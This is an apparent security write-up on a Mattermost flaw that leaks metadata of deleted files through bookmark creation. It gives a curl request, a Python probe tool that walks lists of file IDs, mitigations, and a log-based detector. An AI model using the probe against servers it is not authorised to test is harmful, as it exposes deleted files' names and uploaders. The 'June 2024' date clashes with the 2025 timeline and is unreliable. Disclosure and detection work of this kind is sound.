*Published: June 2024*
Introduction
A vulnerability tracked as CVE-2025-2424 was disclosed in the open-source team messaging platform Mattermost. It affects versions 10.5.x up to and including 10.5.1 and 9.11.x up to and including 9.11.9. The bug is in how Mattermost handles bookmarks that refer to uploaded files: when a bookmark is created, the server does not check whether the referenced file has already been deleted, so an authenticated user can retrieve metadata about files that are supposed to be gone. In this article we break down what that means, walk through a sample request and response, and cover what admins and users can do.
What’s The Problem?
When a user uploads a file to Mattermost, the platform assigns it a unique file ID. Later, that file may be deleted, for example because the user removes the post it was attached to or because a retention policy cleans it up. Once deleted, neither the content nor its metadata (filename, uploader, upload date, MIME type, size) should be retrievable through the API.
However, when a user creates a bookmark that points at the ID of a _deleted_ file, the affected versions do not verify that the file is still live. They look the record up, accept it, and return the leftover file metadata in the response. Any authenticated user who knows a valid but deleted file ID can abuse this.
Affected Versions
- 10.5.x, up to and including 10.5.1
- 9.11.x, up to and including 9.11.9
Upgrading to 10.5.2, 9.11.10, or a later release fixes the issue.
The Flaw
When a bookmark is created with an arbitrary file ID, the Mattermost backend should confirm that the file exists and has not been deleted, and reject the bookmark otherwise. Mattermost soft-deletes file records (the row stays in the database with a deletion timestamp set), so a plain lookup by ID still succeeds after deletion. The affected versions stop at "a record with this ID exists" and never ask "has it been deleted", so the bookmark is created and the file's metadata is returned to the caller.
This is a variant of Insecure Direct Object Reference (IDOR): a caller-supplied object ID is accepted as a reference without checking that the object is still in a state the caller should be able to see.
Real-World Exploit Scenario
1. An attacker with a valid account on the server obtains file IDs. Mattermost file IDs are random 26-character strings, so brute-forcing them is not practical; in practice they come from old message links, exports, browser history, logs, or files the attacker could once see before they were deleted.
2. The attacker sends a bookmark-creation request for each file ID, regardless of whether the file has since been deleted.
3. On an unpatched server, the response includes metadata about the deleted file, such as its filename, size, MIME type, upload timestamp, and the uploader's user ID.
Step 1: Find a File ID
File IDs in Mattermost are 26-character lowercase alphanumeric strings (e.g. e3c6cp5dcfbm7xr4r5ycmo8zzy). They are generated randomly, so the attacker has to obtain them rather than guess them.
Step 2: Create a Bookmark
Channel bookmarks are created with
POST /api/v4/channels/{channel_id}/bookmarks
where {channel_id} is a channel the attacker can post in, and a JSON body like
{
"type": "file",
"file_id": "e3c6cp5dcfbm7xr4r5ycmo8zzy",
"display_name": "Interesting Bookmark"
}
Using curl or any HTTP client (replace the server, CHANNEL_ID and TOKEN with your own values):
curl -X POST "https://YOUR.MATTERMOST.SERVER/api/v4/channels/CHANNEL_ID/bookmarks" \
-H "Authorization: Bearer TOKEN" \
-H "Content-Type: application/json" \
-d '{"type":"file","file_id":"e3c6cp5dcfbm7xr4r5ycmo8zzy","display_name":"Interesting Bookmark"}'
Suppose the target file was deleted. On an unpatched server the bookmark is still created and the response carries the file's record. The shape below is abbreviated and the values are made up for illustration; note the non-zero delete_at, which is the field the server should have checked:
{
"id": "1b2c3d4e5f6g7h8i9jklmno",
"create_at": 1709420000000,
"channel_id": "CHANNEL_ID",
"owner_id": "ATTACKER_USER_ID",
"file_id": "e3c6cp5dcfbm7xr4r5ycmo8zzy",
"display_name": "Interesting Bookmark",
"type": "file",
"file": {
"id": "e3c6cp5dcfbm7xr4r5ycmo8zzy",
"user_id": "uvwx1234yz5678abcd90efgh",
"create_at": 1709420000000,
"delete_at": 1712000000000,
"name": "sensitive_document.pdf",
"extension": "pdf",
"mime_type": "application/pdf",
"size": 845312
}
}
The attacker now knows the name, type, size, upload time and uploader ID of a file that is no longer discoverable through the UI or search. The uploader is returned as a user ID rather than a name or address, but an authenticated user can normally resolve that ID through the regular users API.
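The steps above, as a small Python tool that probes a list of candidate file IDs through bookmark creation and flags any response that hands back the record of a deleted file. It is an added example written for this article, not Mattermost's own code or an official PoC. Everything beyond the page is an assumption and is marked as such in the code: the endpoint path and body fields, that a successful reply carries the file record under "file" with a non-zero "delete_at" for a soft-deleted file, and that a patched server answers such an ID with a 4xx status. The offline fake_transport models both the unpatched and the patched check so the tool can be exercised without a server; swap in http_transport(token) to run it against a test instance you own.

```python
"""Probe candidate file IDs through channel-bookmark creation (added example).

Written for this article; it is not Mattermost's own code. Assumptions that do
not come from the page: the endpoint is POST /api/v4/channels/{channel_id}/bookmarks
with a body of {"type": "file", "file_id": ..., "display_name": ...}; a successful
reply carries the file's record under "file", where a soft-deleted file has a
non-zero "delete_at"; a patched server answers a deleted ID with a 4xx status.
"""
import json
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Tuple

# A transport takes (url, json_body) and returns (http_status, parsed_json).
Transport = Callable[[str, dict], Tuple[int, dict]]


def build_bookmark_request(base_url: str, channel_id: str, file_id: str) -> Tuple[str, dict]:
    """Request for bookmarking one candidate file ID in the given channel."""
    url = f"{base_url.rstrip('/')}/api/v4/channels/{channel_id}/bookmarks"
    return url, {"type": "file", "file_id": file_id, "display_name": f"probe {file_id[:8]}"}


def http_transport(token: str) -> Transport:
    """Transport for a live server: bearer-token POST, standard library only."""
    def send(url: str, body: dict) -> Tuple[int, dict]:
        req = urllib.request.Request(
            url, data=json.dumps(body).encode(), method="POST",
            headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status, json.loads(resp.read() or b"{}")
        except urllib.error.HTTPError as err:
            raw = err.read()
            try:
                return err.code, json.loads(raw) if raw else {}
            except ValueError:          # non-JSON error page
                return err.code, {}
    return send


@dataclass
class ProbeResult:
    file_id: str
    status: int
    leaked: bool                      # metadata of a *deleted* file came back
    info: Dict = field(default_factory=dict)


def classify(file_id: str, status: int, body: dict,
             known_deleted: Iterable[str] = ()) -> ProbeResult:
    """Flag a reply that discloses a deleted file. The server may say so itself
    (delete_at != 0) or we may already know the ID is deleted (e.g. our own
    uploaded-then-deleted test file) and its record still comes back."""
    info = body.get("file") or {}
    if not (200 <= status < 300) or not info:
        return ProbeResult(file_id, status, False, info)
    deleted = bool(info.get("delete_at")) or file_id in set(known_deleted)
    return ProbeResult(file_id, status, deleted, info)


def probe(file_ids: Iterable[str], base_url: str, channel_id: str,
          transport: Transport, known_deleted: Iterable[str] = ()) -> List[ProbeResult]:
    results = []
    for fid in file_ids:
        url, body = build_bookmark_request(base_url, channel_id, fid)
        status, reply = transport(url, body)
        results.append(classify(fid, status, reply, known_deleted))
    return results


def fake_transport(store: Dict[str, dict], patched: bool) -> Transport:
    """Offline stand-in for a server; `store` maps file_id -> file record.
    Unpatched: any stored record is bookmarked and echoed, deleted or not.
    Patched: a record with delete_at != 0 is treated like a missing one."""
    def send(url: str, body: dict) -> Tuple[int, dict]:
        info = store.get(body.get("file_id", ""))
        if info is None or (patched and info.get("delete_at")):
            return 404, {"message": "file not found", "status_code": 404}  # constructed error body
        channel_id = url.split("/channels/")[1].split("/")[0]
        return 201, {"channel_id": channel_id, "file_id": info["id"], "type": "file",
                     "display_name": body["display_name"], "file": info}
    return send


# Constructed sample data: one deleted file (the page's example ID), one live file.
SAMPLE_STORE = {
    "e3c6cp5dcfbm7xr4r5ycmo8zzy": {"id": "e3c6cp5dcfbm7xr4r5ycmo8zzy", "user_id": "uvwx1234yz5678abcd90efgh",
                                   "name": "sensitive_document.pdf", "extension": "pdf", "mime_type": "application/pdf",
                                   "size": 845312, "create_at": 1709420000000, "delete_at": 1712000000000},
    "b7o9yq2r3hnxf4gmt6wzc1sdpa": {"id": "b7o9yq2r3hnxf4gmt6wzc1sdpa", "user_id": "uvwx1234yz5678abcd90efgh",
                                   "name": "agenda.txt", "extension": "txt", "mime_type": "text/plain",
                                   "size": 512, "create_at": 1709430000000, "delete_at": 0},
}
CANDIDATES = list(SAMPLE_STORE) + ["zzzzzzzzzzzzzzzzzzzzzzzzzz"]   # last one never existed

if __name__ == "__main__":
    for label, patched in (("unpatched", False), ("patched", True)):
        transport = fake_transport(SAMPLE_STORE, patched)
        for r in probe(CANDIDATES, "https://mm.example", "8p6q3wz7dtb1jmhx4rnkc9vyfe", transport):
            print(f"{label:9} {r.file_id} status={r.status} leaked={r.leaked} name={r.info.get('name')}")
```

Two practical notes. Every successful probe creates a real bookmark in the channel, so the activity is visible to channel members and shows up in logs; clean the bookmarks up afterwards and only run this against instances you are authorised to test. The known_deleted parameter exists because a server might strip delete_at from the echoed record; uploading a file, deleting it, and then probing its ID gives you a ground-truth check that does not depend on that field.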
Impact
- Reconnaissance: an attacker can confirm that a given file existed and learn its name, type, size, upload time and uploader for files that have been deleted.
- Privacy: files that were deliberately removed (for legal, compliance or privacy reasons) can still leak identifying details through their metadata.
- Targeted attacks: knowing who uploaded what, and when, helps with phishing, social engineering or blackmail.
Mitigation
- Upgrade Mattermost: apply the official fix by moving to at least 10.5.2 or 9.11.10; see the Mattermost Security Updates page for the release notes.
- Treat file IDs as sensitive: they are the only thing an attacker needs, so avoid pasting them into tickets, logs or public links.
- Monitor for abuse: watch access logs for bursts of POST requests to /api/v4/channels/{channel_id}/bookmarks from one account, especially with many 4xx responses, which is what probing a list of file IDs looks like.
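The monitoring point above, as an added example (not from the page or from Mattermost): a detector that reads JSON access-log lines, keeps only bookmark-creation POSTs, and raises an alert when one account exceeds a threshold inside a sliding time window. The log format is an assumption, one JSON object per line with ts, user_id, ip, method, path and status, as a reverse proxy in front of Mattermost might write; the sample lines are constructed for the demo, and parse_line() is the only part to adapt to your real format.

```python
"""Spot bookmark-creation bursts in access logs (added example).

Written for this article, not taken from Mattermost. The log format is an
assumption: one JSON object per line with ts (ISO 8601), user_id, ip, method,
path and status, as a reverse proxy or API gateway in front of Mattermost might
emit. Adapt parse_line() to whatever your proxy or Mattermost's own logging
actually writes.
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, List

# Channel bookmark creation: POST /api/v4/channels/{26-char channel id}/bookmarks
BOOKMARK_POST = re.compile(r"^/api/v4/channels/[a-z0-9]{26}/bookmarks/?$")

# Constructed sample: "attacker" fires seven bookmark POSTs in 30 s, several of
# which hit IDs that do not resolve (404); "alice" creates one bookmark and lists them once.
SAMPLE_LOG = """
{"ts": "2025-04-15T10:00:00+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 201}
{"ts": "2025-04-15T10:00:05+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 404}
{"ts": "2025-04-15T10:00:10+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 404}
{"ts": "2025-04-15T10:00:12+00:00", "user_id": "alice", "ip": "198.51.100.4", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 201}
{"ts": "2025-04-15T10:00:15+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 201}
{"ts": "2025-04-15T10:00:20+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 404}
{"ts": "2025-04-15T10:00:25+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 404}
{"ts": "2025-04-15T10:00:30+00:00", "user_id": "attacker", "ip": "203.0.113.7", "method": "POST", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 201}
{"ts": "2025-04-15T10:00:40+00:00", "user_id": "alice", "ip": "198.51.100.4", "method": "GET", "path": "/api/v4/channels/8p6q3wz7dtb1jmhx4rnkc9vyfe/bookmarks", "status": 200}
"""


def parse_line(line: str) -> Dict:
    """Turn one JSON log line into a record with a parsed timestamp (assumed format)."""
    rec = json.loads(line)
    return {"ts": datetime.fromisoformat(rec["ts"]), "user": rec["user_id"], "ip": rec["ip"],
            "method": rec["method"], "path": rec["path"], "status": int(rec["status"])}


def find_bookmark_bursts(lines: Iterable[str], threshold: int = 5, window_s: int = 60) -> List[Dict]:
    """Alert when one user issues >= threshold bookmark-creation POSTs within window_s seconds.

    Returns one alert per offending user describing the largest window seen,
    including how many of those requests failed (4xx/5xx), which is the
    signature of someone walking a list of file IDs against a patched server.
    """
    events = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = parse_line(line)
        if rec["method"] == "POST" and BOOKMARK_POST.match(rec["path"]):
            events[rec["user"]].append(rec)

    alerts = []
    for user, recs in events.items():
        recs.sort(key=lambda r: r["ts"])
        window = deque()
        best = None
        for r in recs:
            window.append(r)
            while (r["ts"] - window[0]["ts"]).total_seconds() > window_s:
                window.popleft()          # slide the window forward
            if len(window) >= threshold and (best is None or len(window) > best["count"]):
                best = {"user_id": user, "count": len(window),
                        "start": window[0]["ts"].isoformat(), "end": r["ts"].isoformat(),
                        "errors": sum(1 for w in window if w["status"] >= 400),
                        "ips": sorted({w["ip"] for w in window})}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in find_bookmark_bursts(SAMPLE_LOG.splitlines()):
        print(f"ALERT user={alert['user_id']} posts={alert['count']} errors={alert['errors']} "
              f"window={alert['start']}..{alert['end']} ips={alert['ips']}")
```

Tune threshold and window_s to your own baseline; bookmark creation is rare for a normal user, so a low threshold such as five per minute produces few false positives. The errors count is the discriminating signal after you patch: on a fixed server, probing deleted IDs yields a run of 4xx responses, while on an unpatched server the same probing succeeds and the count alone has to carry the alert.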
References
- Mattermost security bulletin for CVE-2025-2424
- Official GitHub CVE entry (pending)
- General guide to IDOR vulnerabilities
Conclusion
CVE-2025-2424 matters if you rely on the privacy of your messaging workspace. By not checking whether a file has been deleted when a bookmark is created, the affected Mattermost versions return metadata about deleted files to any authenticated user who presents their IDs. Patch your servers, keep an eye on bookmark-creation activity in your logs, and remember that deleting a file only protects it if every code path honours the deletion.
If you'd like a code PoC or guidance for patching, feel free to reach out or check the official Mattermost channels.
Timeline
Published on: 04/14/2025 15:15:24 UTC
Last modified on: 04/15/2025 18:39:27 UTC